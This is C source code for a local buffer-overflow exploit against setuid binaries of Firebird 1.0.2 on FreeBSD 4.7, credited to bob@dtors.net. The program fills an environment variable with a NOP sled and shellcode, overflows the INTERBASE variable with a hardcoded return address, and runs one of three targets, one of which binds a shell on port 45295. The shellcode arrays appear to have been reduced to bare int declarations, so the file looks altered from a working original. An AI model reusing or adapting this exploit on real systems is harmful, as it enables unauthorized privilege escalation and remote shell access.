
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






typedef int buffer ;


 int DROP ;
 int INET ;
 int LEN ;
 int LOCK ;
 scalar_t__ decide (char*) ;
 int dropcode ;
 int execl (int ,int ,int *) ;
 int exit (int ) ;
 int fprintf (int ,char*,...) ;
 int inetcode ;
 int lockcode ;
 int memcpy (char*,char*,int) ;
 int memset (char*,int,int) ;
 int printf (char*,...) ;
 int putenv (char*) ;
 int setenv (char*,char*,int) ;
 int stdout ;
 int strlen (char*) ;

int main(int argc, char **argv)
{

 unsigned long ret = 0xbfbff75d;

 char *selectcode;
 char buffer[LEN];
 char egg[1024];
 char *ptr;
 int i=0;



 if(argc < 2)
 {
  printf("( ( Firebird-1.0.2 Local exploit for Freebsd 4.7 ) )\n");
  printf("( (                           by - bob@dtors.net ) )\n");
  printf("----------------------------------------------------\n\n");
  printf("Usage: %s <target#> \n", argv[0]);
  printf("Targets:\n");
  printf("1. [0xbfbff75c] - gds_inet_server\n");
  printf("2. [0xbfbff75d] - gds_lock_mgr\n");
  printf("3. [0xbfbff75e] - gds_drop\n");
  printf("\nwww.dtors.net\n");
  exit(0);
 }

 selectcode = (char *)decide(argv[1]);
   memset(buffer, 0x41, sizeof(buffer));

        ptr = egg;

        for (i = 0; i < 1024 - strlen(selectcode) -1; i++) *(ptr++) = 0x90;
        for (i = 0; i < strlen(selectcode); i++) *(ptr++) = selectcode[i];
        egg[1024 - 1] = '\0';

        memcpy(egg,"EGG=",4);
        putenv(egg);

        memcpy(&buffer[1028],(char *)&ret,4);
        buffer[1032] = 0;

        setenv("INTERBASE", buffer, 1);

        fprintf(stdout, "Return Address: 0x%x\n", ret);
        fprintf(stdout, "Buffer Size: %d\n", LEN);
        fprintf(stdout, "Setuid [90]\n");

if(selectcode == (char *)&inetcode)
  {
 execl(INET, INET, ((void*)0));
 return 0;
   }

if(selectcode == (char *)&lockcode)
  {
  printf("\nShell is on port 45295\nExploit will hang!\n");
 execl(LOCK, LOCK, ((void*)0));
 return 0;
   }

if(selectcode == (char *)&dropcode)
  {
 execl(DROP, DROP, ((void*)0));
 return 0;
   }


 return 0;
}
